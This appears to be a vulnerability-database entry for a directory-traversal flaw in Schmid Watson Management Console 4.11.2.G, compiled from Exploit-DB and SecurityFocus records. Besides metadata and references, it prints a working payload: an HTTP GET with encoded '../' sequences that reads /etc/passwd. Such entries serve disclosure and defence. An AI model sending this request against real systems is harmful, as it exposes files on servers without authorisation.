Details of VAR-E-201301-0264

ID

VAR-E-201301-0264

EDB ID

38203

TITLE

Schmid Watson Management Console - Directory Traversal - Linux remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 38203

DESCRIPTION

Schmid Watson Management Console - Directory Traversal.. remote exploit for Linux platform

Trust: 0.6

sources: EXPLOIT-DB: 38203

AFFECTED PRODUCTS

vendor:	schmid	model:	watson management console	scope:	-	version:	-	Trust: 1.0
vendor:	schmid	model:	watson management console 4.11.2.g	scope:	-	version:	-	Trust: 0.3

sources: BID: 57237 // EXPLOIT-DB: 38203

EXPLOIT

source: https://www.securityfocus.com/bid/57237/info

Schmid Watson Management Console is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.

Exploiting this issue will allow an attacker to view arbitrary files within the context of the affected application. Information harvested may aid in launching further attacks.

Schmid Watson Management Console 4.11.2.G is vulnerable; other versions may also be affected.

GET /%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/passwd http/1.1

Trust: 1.0

sources: EXPLOIT-DB: 38203

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 38203

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 38203

TYPE

Directory Traversal

Trust: 1.0

sources: EXPLOIT-DB: 38203

CREDITS

Dhruv Shah

Trust: 0.6

sources: EXPLOIT-DB: 38203

EXTERNAL IDS

db:	BID	id:	57237	Trust: 1.9
db:	EXPLOIT-DB	id:	38203	Trust: 1.6
db:	EDBNET	id:	59329	Trust: 0.6

sources: BID: 57237 // EXPLOIT-DB: 38203 // EDBNET: 59329

REFERENCES

url:	https://www.securityfocus.com/bid/57237/info	Trust: 1.0
url:	https://www.exploit-db.com/exploits/38203/	Trust: 0.6
url:	http://www.schmid-telecom.com/	Trust: 0.3

sources: BID: 57237 // EXPLOIT-DB: 38203 // EDBNET: 59329

SOURCES

db:	BID	id:	57237
db:	EXPLOIT-DB	id:	38203
db:	EDBNET	id:	59329

LAST UPDATE DATE

2022-07-27T09:49:52.051000+00:00

SOURCES UPDATE DATE

db:

BID

id:

57237

date:

2013-01-09T00:00:00

SOURCES RELEASE DATE

db:	BID	id:	57237	date:	2013-01-09T00:00:00
db:	EXPLOIT-DB	id:	38203	date:	2013-01-09T00:00:00
db:	EDBNET	id:	59329	date:	2013-01-09T00:00:00